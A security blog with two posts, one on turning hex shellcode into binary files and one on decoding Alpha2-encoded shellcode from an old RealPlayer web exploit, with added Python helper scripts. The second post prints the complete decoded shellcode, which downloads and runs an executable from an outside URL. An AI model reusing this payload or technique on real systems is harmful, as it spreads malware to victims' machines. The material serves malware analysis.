Wednesday, 21 August 2013

Convert hex shellcode to binary mode

There are a couple of easy ways to convert hex shellcode into a binary file. Say we have the hex string below:
\x38\x12\x08\xab
  • Bash:
echo -ne "\x38\x12\x08\xab" > b.bin
  • Perl:
perl -e 'print "\x38\x12\x08\xab"' > p.bin
  • online tools such as http://sandsprite.com/shellcode_2_exe.php
Vim can be used to edit the hex of a binary file with ":%!xxd". But Vim doesn't actually support hex editing itself; all it does is pipe the buffer through the xxd command. However, the xxd command might add a newline character, "\n" (ASCII 0A), at the end.
In the screenshot above, the "\x0a" was added by the xxd command; when the file was opened with a hex editor it was not there. To save a modification, the buffer first has to be converted back from the hexdump with ":%!xxd -r", and only then saved.

The Python command below can also convert hex to a binary file, but the annoying thing is that it adds a newline character, "\n" (ASCII 0A), at the end of the file. I haven't figured out how to avoid it yet.
python -c 'print "\x38\x12\x08\xab"' >py.bin
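An added example (not the post's command) of the same conversion in Python 3, with the output file opened in binary mode: the bytes object is written as-is, so the file is exactly as long as the input says. The parser accepts the \x.. form used in the post as well as 0x.. tokens and bare hex pairs; the function names (hex_escapes_to_bytes, write_binary, roundtrip_through_file) and the script name hex2bin.py are assumptions of this example.

```python
import os
import re
import sys
import tempfile

# One token: a \x.. escape (as in the post), a 0x.. literal, or a bare hex pair.
_TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})|0x([0-9a-fA-F]{2})|([0-9a-fA-F]{2})")


def hex_escapes_to_bytes(text: str) -> bytes:
    """Parse '\\x38\\x12\\x08\\xab', '0x38 0x12 ...' or '381208ab' into bytes.
    Whitespace and commas between tokens are ignored; anything else is an error."""
    cleaned = re.sub(r"[\s,]+", "", text)
    out = bytearray()
    pos = 0
    while pos < len(cleaned):
        m = _TOKEN.match(cleaned, pos)
        if m is None:
            raise ValueError(f"not hex at offset {pos}: {cleaned[pos:pos + 6]!r}")
        out.append(int(next(g for g in m.groups() if g is not None), 16))
        pos = m.end()
    return bytes(out)


def write_binary(path: str, data: bytes) -> int:
    """Write the bytes exactly as given: 'wb' mode, no text encoding, no newline."""
    with open(path, "wb") as fh:
        return fh.write(data)


def roundtrip_through_file(text: str):
    """Write the parsed bytes to a temporary file and return (size on disk, contents),
    so the absence of a trailing 0x0A is checked on disk rather than assumed."""
    data = hex_escapes_to_bytes(text)
    fd, path = tempfile.mkstemp(suffix=".bin")
    os.close(fd)
    try:
        write_binary(path, data)
        with open(path, "rb") as fh:
            stored = fh.read()
        return os.path.getsize(path), stored
    finally:
        os.remove(path)


if __name__ == "__main__":
    # usage (hex2bin.py is an assumed file name for this script):
    #   python3 hex2bin.py '\x38\x12\x08\xab' > py.bin
    # sys.stdout.buffer takes raw bytes and appends nothing, unlike print().
    sys.stdout.buffer.write(hex_escapes_to_bytes(sys.argv[1]))
```

Run with the four-byte string from the post and `xxd py.bin` shows exactly four bytes; the difference from the one-liner is only that `print` adds the line terminator and a raw write to the binary stream does not.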

Monday, 12 August 2013

Decode the shell code encoded by Alpha2

This is an old JavaScript exploit embedded in a web page that targeted RealPlayer, and it contained encoded shellcode.


A little Google search indicated that it was produced by an open source shellcode encoder, Alpha2, whose source code is available. According to that source, the strings below are the decoder stub prefixed to the encoded shellcode and should be removed before decoding it:
"TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body
mixedcase_ascii_decoder_body   "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
After removing them we are left with the encoded shellcode itself.

Since the source code was available, I wrote a small program in C to decode it:
#include <stdio.h>
#include <stdlib.h>
/* Alpha2 "mixedcase" decoding: each pair of input characters yields one byte.
 *   high nibble = (low nibble of 1st char) XOR (high nibble of 2nd char)
 *   low nibble  =  low nibble of 2nd char                                  */

/* Next input character, skipping line breaks and spaces (a trailing newline
 * in the input file would otherwise be consumed as half of a pair). */
static int next_char(void) {
  int c;
  while ((c = getchar()) != EOF && (c == '\n' || c == '\r' || c == ' ' || c == '\t'))
    ;
  return c;
}

int main(void) {
  int i, ii, A, B, D, E, F;
  while ((i = next_char()) != EOF) {
    if ((ii = next_char()) == EOF) {
      fprintf(stderr, "odd number of input characters\n");
      return EXIT_FAILURE;
    }
    D = (i & 0x0f);          /* low nibble of first character   */
    E = (ii & 0xf0) >> 4;    /* high nibble of second character */
    F = (ii & 0x0f);         /* low nibble of second character  */
    A = D ^ E;               /* high nibble of decoded byte     */
    B = F;                   /* low nibble of decoded byte      */
    printf("\\x%X%X", A, B); /* one nibble per %X, e.g. \xEB    */
  }
  printf("\n");
  exit(EXIT_SUCCESS);
}
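The same decoding in Python, as an added example rather than the post's code: it strips the decoder stub quoted above, decodes character pairs with the same nibble rule the C program uses, and includes a small encoder that follows that rule so the decoder can be checked by round trip. The encoder's character choice (first alphanumeric candidate) is a simplification of this example and is not how Alpha2 itself picks characters; function names are mine.

```python
# Decoder stub that Alpha2 prepends to the encoded payload (strings from the post).
DECODER_STUB = "TYIIIIIIIIIIIIIIII7QZ" + "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"


def strip_decoder_stub(encoded: str) -> str:
    """Remove the decoder stub if present; what remains is the encoded payload."""
    if encoded.startswith(DECODER_STUB):
        return encoded[len(DECODER_STUB):]
    return encoded


def alpha2_mixedcase_decode(encoded: str) -> bytes:
    """Same nibble arithmetic as the C decoder: two characters -> one byte."""
    payload = "".join(encoded.split())          # ignore line breaks and spaces
    if len(payload) % 2:
        raise ValueError("encoded payload must have an even number of characters")
    out = bytearray()
    for c1, c2 in zip(payload[0::2], payload[1::2]):
        d = ord(c1) & 0x0F                      # low nibble of first character
        e = (ord(c2) & 0xF0) >> 4               # high nibble of second character
        f = ord(c2) & 0x0F                      # low nibble of second character
        out.append(((d ^ e) << 4) | f)
    return bytes(out)


# Alphanumeric bytes only: 0-9, A-Z, a-z.
_ALNUM = [c for c in range(0x30, 0x7B) if chr(c).isalnum()]


def alpha2_mixedcase_encode(data: bytes) -> str:
    """Simplified encoder (assumption of this example: takes the first
    alphanumeric candidate; Alpha2 chooses differently) that the decoder inverts.
    For each byte: pick c2 carrying the low nibble, then c1 whose low nibble
    XOR c2's high nibble gives the byte's high nibble."""
    out = []
    for b in data:
        hi, lo = b >> 4, b & 0x0F
        c2 = next(c for c in _ALNUM if (c & 0x0F) == lo)
        c1 = next(c for c in _ALNUM if (c & 0x0F) == (hi ^ (c2 >> 4)))
        out.append(chr(c1) + chr(c2))
    return "".join(out)


def to_escaped_hex(data: bytes) -> str:
    """Render bytes in the \\xEB\\x10 form the C program prints."""
    return "".join(f"\\x{b:02X}" for b in data)


if __name__ == "__main__":
    sample = bytes([0xEB, 0x10, 0x5A, 0x4A])   # constructed input, not from the exploit
    enc = alpha2_mixedcase_encode(sample)
    print(enc)                                  # alphanumeric only
    print(to_escaped_hex(alpha2_mixedcase_decode(DECODER_STUB + enc)
                         if False else alpha2_mixedcase_decode(strip_decoder_stub(DECODER_STUB + enc))))
```

The round trip over all 256 byte values is the useful check: any byte can be represented because every low nibble 0..F occurs among the alphanumeric characters, which is why an alphanumeric-only decoder needs two characters per byte.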
After decoding we get the following shellcode:
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x66\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x8F\xB3\x66\x66\x66\x3C\x02\xC7\x56\x66\x66\x66\xED\x26\x6A\xED\x16\x7A\xCB\xED\x26\x6E\xED\xBE\xED\x15\x5A\xED\x12\x78\x1E\x65\x95\xED\x18\x46\x65\x9D\xED\x28\x72\x55\x8B\x30\x31\x37\xED\x59\x65\x9D\xED\x94\x0C\x68\x3F\x95\xC0\x12\x6E\x3F\x39\xE5\xA1\x62\x23\x84\x8F\x3F\x39\x38\xED\xAB\xED\x20\x42\x65\xA5\xB7\x87\x65\xA7\x55\xAF\x00\xED\x6E\xED\x20\x7A\x65\xA5\xA7\x87\x64\x65\xA7\xED\x66\x65\xA5\xED\x9C\xED\x91\xE5\xA0\x68\xED\xB6\x0C\x62\x3F\x8E\x36\x66\x66\x66\xE5\xA0\x6B\x34\x30\x99\x31\x9A\x3C\xED\xBE\x0C\x67\x3F\x8E\x5B\x66\x66\x66\xE5\xA0\x75\x30\x20\xE6\x58\xE6\x13\x9C\xE6\x50\xE6\x38\xE5\x8A\x46\xED\xBA\x0C\x46\x35\x99\x31\x8A\xA1\x62\x65\x3A\x07\x48\x03\xA1\x22\x65\x62\x1E\x03\x66\x66\x55\xA6\x36\x36\x35\x30\x36\x99\x31\x9A\xED\xBA\x36\x35\x99\x31\x96\x36\x99\x31\x92\x55\xA6\xCA\xE3\xA6\x13\x9F\x37\x34\x30\x35\x99\xB4\x3C\x3F\xCD\x84\x88\x55\xA6\xA5\x8E\x40\x99\x99\x99\x21\x03\x12\x36\x14\x09\x05\x27\x02\x02\x14\x03\x15\x15\x66\x21\x03\x12\x35\x1F\x15\x12\x03\x0B\x22\x0F\x14\x03\x05\x12\x09\x14\x1F\x27\x66\x31\x0F\x08\x23\x1E\x03\x05\x66\x23\x1E\x0F\x12\x32\x0E\x14\x03\x07\x02\x66\x2A\x09\x07\x02\x2A\x0F\x04\x14\x07\x14\x1F\x27\x66\x13\x14\x0A\x0B\x09\x08\x66\x33\x34\x2A\x22\x09\x11\x08\x0A\x09\x07\x02\x32\x09\x20\x0F\x0A\x03\x27\x66\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6B\x6F\x31\x31\x38\x2E\x63\x6E\x2F\x78\x2E\x65\x78\x65\x80\x00 
This can be converted to an executable with shellcode_2_exe and the executable run under OllyDbg. As we can see, the shellcode is still encrypted: the first thing it does is decode the rest of the code, 13CH bytes in total (from 00401017), by XORing each byte with 66H.

That gives us the decrypted shellcode. The remaining code calls URLDownloadToFile to download a file from http://www.ko118.cn/x.exe and save it to C:\WINDOWS\system32\a.exe, and then calls WinExec to run a.exe.
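As an added Python example (not the post's code), the second stage described above done statically: the first 17h bytes of the decoded shellcode printed above are the XOR loop, so the script checks those bytes against the instruction encodings seen in the debugger, reads the count (13Ch) and key (66h) out of them rather than hardcoding them, applies the XOR to the 13Ch bytes from offset 17h, and lists the printable strings of the result, which is where the imported API names and the download URL become visible without executing the sample. The shellcode bytes are the ones printed above; function names are mine.

```python
import re

# First-stage (Alpha2-decoded) shellcode from the post, as hex (366 bytes).
SHELLCODE_HEX = (
    "eb105a4a33c966b93c01" "80340a66e2faeb05e8eb" "ffffff8fb36666663c02"
    "c756666666ed266aed16" "7acbed266eedbeed155a" "ed12781e6595ed184665"
    "9ded2872558b303137ed" "59659ded940c683f95c0" "126e3f39e5a16223848f"
    "3f3938edabed204265a5" "b78765a755af00ed6eed" "207a65a5a7876465a7ed"
    "6665a5ed9ced91e5a068" "edb60c623f8e36666666" "e5a06b343099319a3ced"
    "be0c673f8e5b666666e5" "a0753020e658e6139ce6" "50e638e58a46edba0c46"
    "3599318aa162653a0748" "03a12265621e03666655" "a6363635303699319aed"
    "ba363599319636993192" "55a6cae3a6139f373430" "3599b43c3fcd848855a6"
    "a58e4099999921031236" "14090527020214031515" "66210312351f1512030b"
    "220f1403051209141f27" "66310f08231e03056623" "1e0f12320e1403070266"
    "2a0907022a0f04140714" "1f276613140a0b090866" "33342a220911080a0907"
    "023209200f0a03276668" "7474703a2f2f7777772e" "6b6f3131382e636e2f78"
    "2e6578658000"
)
SHELLCODE = bytes.fromhex(SHELLCODE_HEX)


def parse_xor_stub(sc: bytes):
    """Verify the XOR decoder loop at the start of the shellcode and return
    (start offset, byte count, key) of the region it decrypts.

    Offsets within the shellcode:
      00  EB 10           jmp  12h
      02  5A              pop  edx             ; return address pushed by the call (17h)
      03  4A              dec  edx             ; edx = 16h
      04  33 C9           xor  ecx, ecx
      06  66 B9 3C 01     mov  cx, 13Ch        ; byte count
      0A  80 34 0A 66     xor  byte [edx+ecx], 66h
      0E  E2 FA           loop 0Ah             ; ecx = 13Ch .. 1
      10  EB 05           jmp  17h             ; into the decrypted code
      12  E8 EB FF FF FF  call 02h
      17  ...             encrypted second stage
    """
    if sc[0:2] != b"\xeb\x10" or sc[2:6] != b"\x5a\x4a\x33\xc9":
        raise ValueError("unexpected prologue")
    if sc[6:8] != b"\x66\xb9":                       # mov cx, imm16
        raise ValueError("expected 'mov cx, imm16' at offset 6")
    length = int.from_bytes(sc[8:10], "little")
    if sc[10:13] != b"\x80\x34\x0a":                 # xor byte [edx+ecx], imm8
        raise ValueError("expected 'xor byte [edx+ecx], imm8' at offset 0Ah")
    key = sc[13]
    if sc[0x12:0x17] != b"\xe8\xeb\xff\xff\xff":     # call back to offset 2
        raise ValueError("expected 'call 02h' at offset 12h")
    edx = (0x12 + 5) - 1                             # pushed return address, then dec
    return edx + 1, length, key                      # [edx+1 .. edx+length]


def decrypt_second_stage(sc: bytes) -> bytes:
    """Apply the loop's XOR to the region it covers; everything else is untouched."""
    start, length, key = parse_xor_stub(sc)
    if start + length > len(sc):
        raise ValueError("decoder loop runs past the end of the shellcode")
    body = bytearray(sc)
    for i in range(start, start + length):
        body[i] ^= key
    return bytes(body)


def extract_strings(data: bytes, min_len: int = 5):
    """Runs of printable ASCII, the usual first look at decrypted shellcode."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


if __name__ == "__main__":
    start, length, key = parse_xor_stub(SHELLCODE)
    print(f"decoder loop: XOR {length:#x} bytes from offset {start:#x} with key {key:#x}")
    for s in extract_strings(decrypt_second_stage(SHELLCODE)):
        print(s)
```

The decrypted region ends exactly at the null after "URLDownloadToFileA"; the URL that follows it was never XORed, which is why it is already readable in the decoded shellcode printed above.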



a.exe was probably a downloader that would fetch further trojans from the Internet.